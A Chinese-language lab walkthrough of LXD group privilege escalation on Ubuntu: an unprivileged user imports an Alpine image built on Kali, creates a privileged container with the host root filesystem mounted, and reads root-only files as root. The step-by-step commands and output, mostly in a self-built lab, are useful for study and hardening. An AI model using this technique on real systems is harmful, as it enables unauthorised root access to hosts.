Ubuntu
root安装lxd、lxc、lxc-templates 以及 zfsutils-linux
cps@ubuntu:~$ sudo su root
root@ubuntu:/home/cps# apt install lxd lxc lxc-templates
E: Could not get lock /var/lib/dpkg/lock-frontend - open (11: Resource temporarily unavailable)
E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), is another process using it?
root@ubuntu:/home/cps# cd Desktop/
root@ubuntu:/home/cps/Desktop# ll
total 12
drwxr-xr-x 2 cps cps 4096 5月 5 12:59 ./
drwxr-xr-x 15 cps cps 4096 5月 5 12:57 ../
-rw------- 1 cps cps 150 5月 4 18:22 lock.sh
root@ubuntu:/home/cps/Desktop# chmod 777 lock.sh
root@ubuntu:/home/cps/Desktop# ./lock.sh
Hit:1 http://security.ubuntu.com/ubuntu bionic-security InRelease
Hit:2 http://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:3 http://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease
Hit:4 http://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease
Reading package lists... Done
Building dependency tree
Reading state information... Done
319 packages can be upgraded. Run 'apt list --upgradable' to see them.
root@ubuntu:/home/cps/Desktop# apt install lxd lxc lxc-templates
root@ubuntu:/home/cps/Desktop# apt install zfsutils-linux
创建一个普通账户aaa添加到lxd组
root@ubuntu:/home/cps# useradd aaa
root@ubuntu:/home/cps# passwd aaa
Enter new UNIX password: 111111
Retype new UNIX password: 111111
passwd: password updated successfully
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa)
root@ubuntu:/home/cps# cat /etc/group | grep aaa
aaa:x:1001:
root@ubuntu:/home/cps# usermod -G lxd aaa
root@ubuntu:/home/cps# cat /etc/group | grep aaa
lxd:x:127:cps,aaa
aaa:x:1001:
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa),127(lxd)
root@ubuntu:/home/cps#
lxd初始化
root@ubuntu:/home/cps# lxd init
选项[default=zfs] ,这里改选dir,其他回车默认
lxc启动容器
本地如果没有ubuntu,会自动下载,时间比较久
root@ubuntu:/home/cps# lxc launch ubuntu
To start your first container, try: lxc launch ubuntu:18.04
Creating the container
The local image 'ubuntu' couldn't be found, trying 'ubuntu:' instead.
Retrieving image: rootfs: 2% (101.99kB/s)
list查看容器
root@ubuntu:/home/cps# lxc launch ubuntu
Creating the container
The local image 'ubuntu' couldn't be found, trying 'ubuntu:' instead.
Container name is: fun-mustang
Starting fun-mustang
root@ubuntu:/home/cps# lxc list
Kail
下载alpine,build构建
┌──(root㉿kali)-[~]
└─# ping www.baidu.com
PING www.a.shifen.com (183.2.172.42) 56(84) bytes of data.
64 bytes from 183.2.172.42 (183.2.172.42): icmp_seq=1 ttl=128 time=39.3 ms
64 bytes from 183.2.172.42 (183.2.172.42): icmp_seq=2 ttl=128 time=49.5 ms
^Z
zsh: suspended ping www.baidu.com
┌──(root㉿kali)-[~]
└─# git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 90.00 KiB/s, done.
Resolving deltas: 100% (15/15), done.
┌──(root㉿kali)-[~]
└─# cd lxd-alpine-builder
┌──(root㉿kali)-[~/lxd-alpine-builder]
└─# ./build-alpine
开启http服务
将文件alpine-v3.13-x86_64-20210218_0139.tar.gz
移动到桌面/Desktop,在/Desktop目录下开启http服务
┌──(root㉿kali)-[~/lxd-alpine-builder]
└─# cd ..
┌──(root㉿kali)-[~]
└─# cd Desktop
┌──(root㉿kali)-[~/Desktop]
└─# python -m SimpleHTTPServer
/usr/bin/python: No module named SimpleHTTPServer
┌──(root㉿kali)-[~/lxd-alpine-builder]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
ip信息
┌──(root㉿kali)-[~]
└─# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host proto kernel_lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:fa:4e:d4 brd ff:ff:ff:ff:ff:ff
inet 192.168.196.3/24 brd 192.168.196.255 scope global dynamic noprefixroute eth0
valid_lft 942sec preferred_lft 942sec
inet6 fe80::20c:29ff:fefa:4ed4/64 scope link noprefixroute
valid_lft forever preferred_lft forever
┌──(root㉿kali)-[~]
└─#
Ubuntu
Error!!aaa无法登录图形化界面
删除aaa,重新创建用户,重新加入组
cps@ubuntu:~$ sudo su root
[sudo] password for cps:
root@ubuntu:/home/cps# userdel aaa
root@ubuntu:/home/cps# adduser aaa
Adding user `aaa' ...
Adding new group `aaa' (1001) ...
Adding new user `aaa' (1001) with group `aaa' ...
Creating home directory `/home/aaa' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for aaa
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
root@ubuntu:/home/cps#
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa)
root@ubuntu:/home/cps# usermod -G lxd aaa
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa),127(lxd)
root@ubuntu:/home/cps# su aaa
aaa@ubuntu:/home/cps$
aaa 切换/tmp目录下载tar.gz包
aaa@ubuntu:/tmp$ wget 192.168.196.3:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
映像添加到lxd并查看
aaa@ubuntu:/tmp$ ll alpine-v3.13-x86_64-20210218_0139.tar.gz
-rw-rw-r-- 1 aaa aaa 3259593 5月 5 15:39 alpine-v3.13-x86_64-20210218_0139.tar.gz
aaa@ubuntu:/tmp$ lxc image import /tmp/alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
aaa@ubuntu:/tmp$ lxc image list
普通用户aaa提权
root新建file
root@ubuntu:~/snap# cd /root/
root@ubuntu:~# touch testaaa.txt
root@ubuntu:~# vi testaaa.txt
root@ubuntu:~# cat testaaa.txt
root can see
root@ubuntu:~# ls
snap testaaa.txt
root@ubuntu:~#
aaa无权访问
aaa@ubuntu:~$ cd /root/
bash: cd: /root/: Permission denied
aaa@ubuntu:~$
利用lxc提权
aaa@ubuntu:~$ lxc init myimage aaa -c security.privileged=true
Creating aaa
aaa@ubuntu:~$ lxc config device add aaa mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to aaa
aaa@ubuntu:~$ lxc start aaa
- lxc init来初始化myimage,也就是alpine系统,并创建aaa账户,通过c参数来配置安全提升策略为true,代表aaa可申请高级权限
- lxc config device配置设备,add把mydevice设备添加到了aaa账户中,disk是磁盘挂载,把本机/目录挂载到容器的/mnt下,recursive即是否递归,代表是否将所有子目录及所有文件进行挂载
- lxc start启动刚刚添加的用户
- lxc exec执行,以aaa执行sh
提权测试
aaa@ubuntu:~$ lxc exec aaa /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # whoami
root
~ # pwd
/root
~ # cd /mnt/
/mnt # cd root/
/mnt/root # pwd
/mnt/root
/mnt/root # cd ./root/
/mnt/root/root # ls
snap testaaa.txt
/mnt/root/root # cat testaaa.txt
root can see
/mnt/root/root